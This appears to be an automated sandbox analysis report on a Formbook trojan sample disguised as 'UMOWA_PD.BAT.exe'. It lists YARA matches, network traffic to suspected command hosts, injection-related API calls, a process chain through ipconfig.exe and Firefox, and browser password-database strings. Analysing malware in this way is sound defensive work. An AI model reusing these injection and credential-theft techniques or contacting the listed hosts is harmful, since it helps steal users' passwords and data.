            Date: Wed, 25 Sep 2024 08:22:27 GMT
            X-Varnish: 1105031301
            Age: 0
            Via: 1.1 varnish
            Connection: close
            X-Varnish-Cache: MISS
            Server: C2M Server v1.02
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:07 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:09 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:12 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:15 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:21 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "66b1b463-8a"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:23 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "66b1b463-8a"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:26 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "66b1b463-8a"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 25 Sep 2024 08:00:29 GMT
            Content-Type: text/html
            Content-Length: 138
            Connection: close
            ETag: "66b1b463-8a"
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknown HTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49756 version: TLS 1.2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exe Code function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5

        E-Banking Fraud

        Source: Yara match File source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD34E0 NtCreateMutant,LdrInitializeThunk,2_2_33CD34E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_33CD2B90
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_33CD2D10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD4260 NtSetContextThread,2_2_33CD4260
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD4570 NtSuspendThread,2_2_33CD4570
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2BC0 NtQueryInformationToken,2_2_33CD2BC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2BE0 NtQueryVirtualMemory,2_2_33CD2BE0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B80 NtCreateKey,2_2_33CD2B80
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B00 NtQueryValueKey,2_2_33CD2B00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B10 NtAllocateVirtualMemory,2_2_33CD2B10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2B20 NtQueryInformationProcess,2_2_33CD2B20
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2AC0 NtEnumerateValueKey,2_2_33CD2AC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2A80 NtClose,2_2_33CD2A80
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2AA0 NtQueryInformationFile,2_2_33CD2AA0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2A10 NtWriteFile,2_2_33CD2A10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD29D0 NtWaitForSingleObject,2_2_33CD29D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD29F0 NtReadFile,2_2_33CD29F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD38D0 NtGetContextThread,2_2_33CD38D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2FB0 NtSetValueKey,2_2_33CD2FB0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2F00 NtCreateFile,2_2_33CD2F00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2F30 NtOpenDirectoryObject,2_2_33CD2F30
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2EC0 NtQuerySection,2_2_33CD2EC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2ED0 NtResumeThread,2_2_33CD2ED0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2E80 NtCreateProcessEx,2_2_33CD2E80
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2EB0 NtProtectVirtualMemory,2_2_33CD2EB0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2E50 NtCreateSection,2_2_33CD2E50
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2E00 NtQueueApcThread,2_2_33CD2E00
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2DC0 NtAdjustPrivilegesToken,2_2_33CD2DC0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2DA0 NtReadVirtualMemory,2_2_33CD2DA0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2D50 NtWriteVirtualMemory,2_2_33CD2D50
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2CD0 NtEnumerateKey,2_2_33CD2CD0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2CF0 NtDelayExecution,2_2_33CD2CF0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD3C90 NtOpenThread,2_2_33CD3C90
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C50 NtUnmapViewOfSection,2_2_33CD2C50
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C10 NtOpenProcess,2_2_33CD2C10
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C20 NtSetInformationFile,2_2_33CD2C20
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD3C30 NtOpenProcessToken,2_2_33CD3C30
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2C30 NtMapViewOfSection,2_2_33CD2C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03264260 NtSetContextThread,LdrInitializeThunk,4_2_03264260
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03264570 NtSuspendThread,LdrInitializeThunk,4_2_03264570
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032634E0 NtCreateMutant,LdrInitializeThunk,4_2_032634E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B80 NtCreateKey,LdrInitializeThunk,4_2_03262B80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03262B90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_03262BC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262A10 NtWriteFile,LdrInitializeThunk,4_2_03262A10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262A80 NtClose,LdrInitializeThunk,4_2_03262A80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032629F0 NtReadFile,LdrInitializeThunk,4_2_032629F0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032638D0 NtGetContextThread,LdrInitializeThunk,4_2_032638D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262F00 NtCreateFile,LdrInitializeThunk,4_2_03262F00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262E00 NtQueueApcThread,LdrInitializeThunk,4_2_03262E00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262E50 NtCreateSection,LdrInitializeThunk,4_2_03262E50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262ED0 NtResumeThread,LdrInitializeThunk,4_2_03262ED0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_03262D10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C30 NtMapViewOfSection,LdrInitializeThunk,4_2_03262C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03262C50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262CF0 NtDelayExecution,LdrInitializeThunk,4_2_03262CF0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B20 NtQueryInformationProcess,4_2_03262B20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B00 NtQueryValueKey,4_2_03262B00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262B10 NtAllocateVirtualMemory,4_2_03262B10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262BE0 NtQueryVirtualMemory,4_2_03262BE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262AA0 NtQueryInformationFile,4_2_03262AA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262AC0 NtEnumerateValueKey,4_2_03262AC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032629D0 NtWaitForSingleObject,4_2_032629D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262F30 NtOpenDirectoryObject,4_2_03262F30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262FB0 NtSetValueKey,4_2_03262FB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262EB0 NtProtectVirtualMemory,4_2_03262EB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262E80 NtCreateProcessEx,4_2_03262E80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262EC0 NtQuerySection,4_2_03262EC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262D50 NtWriteVirtualMemory,4_2_03262D50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262DA0 NtReadVirtualMemory,4_2_03262DA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262DC0 NtAdjustPrivilegesToken,4_2_03262DC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C20 NtSetInformationFile,4_2_03262C20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03263C30 NtOpenProcessToken,4_2_03263C30
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262C10 NtOpenProcess,4_2_03262C10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03263C90 NtOpenThread,4_2_03263C90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03262CD0 NtEnumerateKey,4_2_03262CD0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EF177 NtQueryInformationProcess,4_2_030EF177
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33CE7BE4 appears 78 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33C8B910 appears 241 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33D0E692 appears 73 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33CD5050 appears 34 times
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: String function: 33D1EF10 appears 98 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03265050 appears 35 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 032AEF10 appears 105 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0321B910 appears 266 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 03277BE4 appears 88 times
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0329E692 appears 84 times
        Source: UMOWA_PD.BAT.exe, 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.0000000033A1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000000.15099477242.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033F30000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exeBinary or memory string: OriginalFilenamenygifte.exe4 vs UMOWA_PD.BAT.exe
        Source: UMOWA_PD.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/10@17/12
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile created: C:\Users\user\polaritetsJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nsbFD8B.tmpJump to behavior
        Source: UMOWA_PD.BAT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: ipconfig.exe, 00000004.00000002.19064432079.0000000007D74000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15574993726.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: ipconfig.exe, 00000004.00000003.15567298333.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19059845738.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15573540125.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15567599300.0000000002C0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: ipconfig.exe, 00000004.00000002.19064432079.0000000007DC6000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064432079.0000000007DDA000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile read: C:\Users\user\Desktop\UMOWA_PD.BAT.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: windows.storage.dllJump to behavior
